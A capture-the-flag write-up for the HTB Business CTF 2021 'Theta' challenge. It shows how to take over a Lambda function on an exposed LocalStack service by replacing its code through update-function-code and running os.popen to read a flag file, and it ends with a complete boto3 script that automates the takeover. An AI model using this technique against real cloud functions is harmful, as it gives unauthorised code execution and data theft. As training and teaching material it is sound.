HTB Business CTF 2021 — Theta

Arifin
Jul 29, 2021

I start the challenge by scanning the host for open ports. With naabu, only ports 22 and 4566 come back open.

(screenshot: scanning for open ports)

After some recon on GitHub I guessed that port 4566 is LocalStack (4566 is its default edge port). Browsing to it only returns “status: running”.

(screenshot: default page)

The /health endpoint lists which LocalStack services are running.

(screenshot: all running services)

Three services are running on this LocalStack instance: Lambda, logs, and CloudWatch. I focused on Lambda first. Lambda is AWS's serverless compute service: it runs your code without you managing any servers.

First, enumerate Lambda with the AWS CLI pointed at the LocalStack endpoint. LocalStack does not validate credentials, so any dummy access key configured locally is enough for the CLI to sign the requests.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda list-functions

There is a single function, named “billing”.

(screenshot: list of all functions)

Next, pull the details of the “billing” function.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda get-function --function-name billing

The response includes Code.Location, a URL from which the function's deployment package can be downloaded.

(screenshot: get-function output for “billing”)

Downloading it gives lambda_archive.zip, which contains the source used by “billing”.

(screenshot: lambda-function code)

Invoking “billing” shows its normal output.

(screenshot: invoking the function “billing”)

For the first attempt, I tried to create a new function from the same code in lambda_archive.zip.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda create-function --function-name billing1 --publish --runtime python3.8 --zip-file fileb://lambda_archive.zip --handler test.handler --role arn:aws:iam::012351735804:role/billing_mgr

Unfortunately, creating a new function failed with an error.

(screenshot: error when creating a new function)

For the second attempt, I modified the existing function's code instead, changing the body it returns.

(screenshot: edited lambda function)

Then zip the edited file back into lambda_archive.zip.

$ zip lambda_archive.zip lambda_function.py

After that, push the new package to the existing function with update-function-code.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda update-function-code --function-name billing --zip-file fileb://lambda_archive.zip

The response confirms that the function's code was replaced.

(screenshot: function “billing” successfully updated)

Invoke “billing” again to see the new output.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda invoke --function-name billing log.txt; cat log.txt

Voilà! The response body now carries my modified output. Being able to call UpdateFunctionCode on a function is effectively code execution inside that function's runtime, so in real AWS the lambda:UpdateFunctionCode permission deserves the same scrutiny as lambda:CreateFunction.

(screenshot: invoking “billing” with the new output)

The last step is to use the same trick to enumerate the host the function runs on: os.popen gives command execution in the Lambda runtime, and in this setup the host filesystem was reachable from it. The flag turned out to be in /opt, so the final lambda_function.py reads it and returns it in the response.

import json
import os

def lambda_handler(event, context):
    # os.popen runs the command inside the Lambda runtime and returns its
    # stdout; the file contents come back in the invocation response body
    flag = os.popen("cat /opt/flag.txt").read()
    return {
        'message': flag
    }

Updating the function with this code and invoking it once more returns the flag.

$ aws --endpoint-url=http://10.129.173.216:4566 lambda invoke --function-name billing log.txt; cat log.txt

(screenshot: the flag)

Flag : HTB{upd4t3s_4r3_n0_m0r3_s3cur3}
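The whole chain above (check /health, fetch the current package via Code.Location, build a replacement package in memory, push it with UpdateFunctionCode, invoke) can be scripted. The following is an added example, not code from the original write-up: it uses boto3 against the endpoint and function name from the write-up, keeps a copy of the original package so the function can be restored afterwards, and the health document it parses is constructed sample data in the shape 2021-era LocalStack returned. boto3 is assumed to be installed; it is imported lazily so the package-building and parsing helpers run without it.

```python
"""Added example: scripting the LocalStack Lambda code replacement from the
write-up.  ENDPOINT and FUNCTION_NAME are the write-up's values; SAMPLE_HEALTH
is constructed sample data, not a captured response."""
import io
import json
import urllib.request
import zipfile

ENDPOINT = "http://10.129.173.216:4566"   # LocalStack edge port from the write-up
FUNCTION_NAME = "billing"

# Replacement handler. File name and handler name match the package the
# write-up downloaded (lambda_function.py / lambda_handler), so the function's
# Handler setting does not need to change.
PAYLOAD_SOURCE = (
    "import os\n"
    "\n"
    "def lambda_handler(event, context):\n"
    "    # whatever command runs here executes inside the Lambda runtime\n"
    "    return {'message': os.popen('cat /opt/flag.txt').read()}\n"
)

# Constructed sample of the GET /health document (assumed shape: a 'services'
# map of service name -> state string).
SAMPLE_HEALTH = json.dumps({
    "services": {"lambda": "running", "logs": "running",
                 "cloudwatch": "running", "s3": "disabled"}
})


def running_services(health_json):
    """Return the names of services GET /health reports as 'running'."""
    services = json.loads(health_json).get("services", {})
    return sorted(name for name, state in services.items() if state == "running")


def build_zip(source, filename="lambda_function.py"):
    """Build an in-memory deployment package holding a single source file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(filename, source)
    return buf.getvalue()


def zip_entries(zip_bytes):
    """Map file name -> text for a deployment package; used to verify the
    replacement before pushing it and to inspect the downloaded original."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return {name: zf.read(name).decode() for name in zf.namelist()}


def fetch_health(endpoint=ENDPOINT):
    """GET /health from the LocalStack edge endpoint (network access needed)."""
    with urllib.request.urlopen(endpoint + "/health") as resp:
        return resp.read().decode()


def replace_function_code(endpoint=ENDPOINT, name=FUNCTION_NAME, source=PAYLOAD_SOURCE):
    """Back up the current package, push the replacement, invoke the function
    and return (original_package_bytes, invocation_result).  Restore later with
    client.update_function_code(FunctionName=name, ZipFile=original_package_bytes)."""
    import boto3  # assumption: boto3 installed; LocalStack accepts any key pair
    client = boto3.client("lambda", endpoint_url=endpoint, region_name="us-east-1",
                          aws_access_key_id="test", aws_secret_access_key="test")
    current = client.get_function(FunctionName=name)
    # Code.Location is the download URL the write-up used for lambda_archive.zip
    with urllib.request.urlopen(current["Code"]["Location"]) as resp:
        original_package = resp.read()
    client.update_function_code(FunctionName=name, ZipFile=build_zip(source))
    result = client.invoke(FunctionName=name)
    return original_package, json.loads(result["Payload"].read())


if __name__ == "__main__":
    print("running services (sample):", running_services(SAMPLE_HEALTH))
    print("package entries:", list(zip_entries(build_zip(PAYLOAD_SOURCE))))
    # against a live target:
    # backup, output = replace_function_code()
    # print(output["message"])
```

Keeping the original package is the one step the manual CLI flow skips: once UpdateFunctionCode succeeds the previous code is gone unless you saved the download from Code.Location, and on an engagement you want to put the function back exactly as it was.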
